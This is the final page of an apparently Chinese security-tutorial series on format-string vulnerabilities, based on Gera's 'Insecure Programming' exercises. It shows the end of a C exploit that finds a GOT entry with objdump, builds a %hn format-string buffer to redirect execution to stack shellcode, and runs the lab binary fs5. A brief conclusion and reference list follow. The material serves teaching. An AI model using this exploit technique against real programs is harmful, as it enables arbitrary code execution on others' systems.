WEB开发网
开发学院网络安全黑客技术 非安全编程演示之格式化字符串(2) 阅读

非安全编程演示之格式化字符串(2)

 2006-04-02 20:26:42 来源:WEB开发网   
核心提示: if(i == 30) {printf("Can't find our format string in stack.\n");printf("Some padding may be needed. Aborting...\n");exit(


if(i == 30) {
printf("Can't find our format string in stack.\n");
printf("Some padding may be needed. Aborting...\n");
exit(1);
}


sprintf(temp_buffer, "%s -R %s | %s deregister", OBJDUMP, VICTIM,
GREP);
f = popen(temp_buffer, "r");
if( fscanf(f, "%08x", &deregister_address) != 1) {
pclose(f);
printf("Error: Cannot find deregister address in GOT!\n");
exit(1);
}
pclose(f);


printf("_deregister address in GOT is: 0x%08x\n",
deregister_address);
printf("shellcode address in stack is: 0x%08x\n\n", ret);


first_half = (ret & 0xffff0000) >> 16;
second_half= (ret & 0x0000ffff);


/* Evil buffer construction */
p = evil_buffer;
bzero(p, sizeof(evil_buffer));


/* first_half*/
*((void **)p) = (void *) (deregister_address + 2);
p += 4;


/* second_half */
*((void **)p) = (void *) (deregister_address);
p += 4;


sprintf(p, "%%.%ud%%%d$hn""%%.%ud%%%d$hn", first_half - 8, i + 1,
second_half - first_half, i + 2);
execle("/home/user/gera/fs5", "fs5", evil_buffer, NULL, env);
}

结论


Format strings 漏洞比较容易发现(相对而言缓冲区溢出有时候比较难发现,即便很仔细的检查了源代码)。自动检测工具检测代码中存在的漏洞通常是有用的。那么,为什么format strings漏洞被认为具有很大的威胁呢?原因在于它被引起重视的时间比较晚---直到2000。由于程序员一时偷懒,在很多旧的守护进程和应用程序中存在大量的format string bug。格式化字符串漏洞在将来不可避免的将带来很多安全问题。
参考
1. Gera, “Insecure Programming by Example”
http://community.core-sdi.com/~gera/InsecureProgramming/


2. scut, “Exploiting Format String Vulnerabilities”
http://www.team-teso.net/releases/formatstring-1.2.tar.gz


3. Aleph One, “Smashing The Stack For Fun and Profit”
http://www.phrack.com/phrack/49/P49-14


4. Linux Programmer's Manual, snprintf() function
http://www.die.net/doc/linux/man/man3/snprintf.3.html


5. Core Security Team, “Vulnerabilities
in your code – Advanced Buffer Overflows”
http://www.core-sec.com/examples/core_vulnerabilities.pdf

上一页  3 4 5 6 7 8 

Tags:安全 编程 演示

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接